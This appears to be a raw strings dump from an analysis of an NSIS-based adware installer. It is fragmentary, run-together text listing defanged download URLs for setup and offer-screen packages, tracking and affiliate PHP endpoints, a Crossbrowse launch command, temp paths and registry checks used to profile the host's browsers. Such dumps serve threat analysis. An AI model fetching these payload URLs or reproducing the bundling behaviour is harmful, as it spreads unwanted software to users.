X`i@_$,ZS.dbo7.6.30*%UPnsd40.tmp0.html?://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe0~hXXp://secured.nmsgv.us/os/rm/OfferScreen_460_v2.zip~hXXp://dl.lockmaprack.com/monti/llyun/ssup/setup.exe~hXXp://dl.lockmaprack.com/monti/llyun/ssup/setup.exe~null~0~0~0#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD_v2.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~012~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD_v2.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~01830104E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq3D.tmp{E1070104-F404-44CE-B556-0622F9D63EE5}AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniportft Windows XPC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq3D.tmpC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Tempnsq3D.tmpCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd3F.tmpC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq3D.tmp334253416280462451835300353920420318722097470340818026217143277082334256632769962425094194.242.96.218_2015-09-02_02:40:01460~hXXp://secured.nmsgv.us/os/rm/OfferScreen_460_v2.zip~hXXp://dl.lockmaprack.com/monti/llyun/ssup/setup.exe~hXXp://dl.lockmaprack.com/monti/llyun/ssup/setup.exe~null~0~0~0#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD_v2.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0ttp://secured.nmsgv.us/os/rm/OfferScreen_460_v2.zip~hXXp://dl.lockmaprack.com/monti/llyun/ssup/setup.exe~hXXp://dl.lockmaprack.com/monti/llyun/ssup/setup.exe~null~0~0~0#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD_v2.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0163864018458223912490616hXXp://VVV.fcesneim.us/FCL_Co_Unq_remote_v5.phphXXp://VVV.stsunsetwest.com/DS_Unq_trackstats_mon.phphXXp://VVV.stsunsetwest.com/DSS_Unq_IMapplication_mon_remote.php"%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe" -- "%1"hXXp://VVV.stsunsetwest.com/DS_AdvAffiliateId.phphXXp://secured.nmsgv.us/os/rm/OfferScreen_460_v2.ziphXXp://dl.lockmaprack.com/monti/llyun/ssup/setup.exehXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD_v2.zipO|V^0*S^0*E^0*EV1^0*T^0,ER|HKLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera Software576#O|V^0*S^0*E^0*EV1^0*T^0,ER|HKLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera SoftwareRE3|Opera SoftwareOpera.96.218_2015-09-02_02:40:01iliateId.phpmote.phpOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd40.tmp\FirstResult.txt76#O|V^0*S^0*E^0*EV1^0*T^0,ER|HKLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera Softwaretp://secured.nmsgv.us/os/rm/OfferScreen_12_HD_v2.zip7970.exel.lockmaprack.com/monti/llyun/ssup/setup.exe~hXXp://dl.lockmaprack.com/monti/llyun/ssup/setup.exe~null~0~0~0up_17970.exe~null~0~0~0ault,RE2|Opera Software,RE3|Opera Software/cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0)-.YlnNullsoft Install System v11-Jul-2014.cvshXXp://VVV.microsoft.comnsq3D.tmp_240_rwx_10004000_00001000:callback%d3>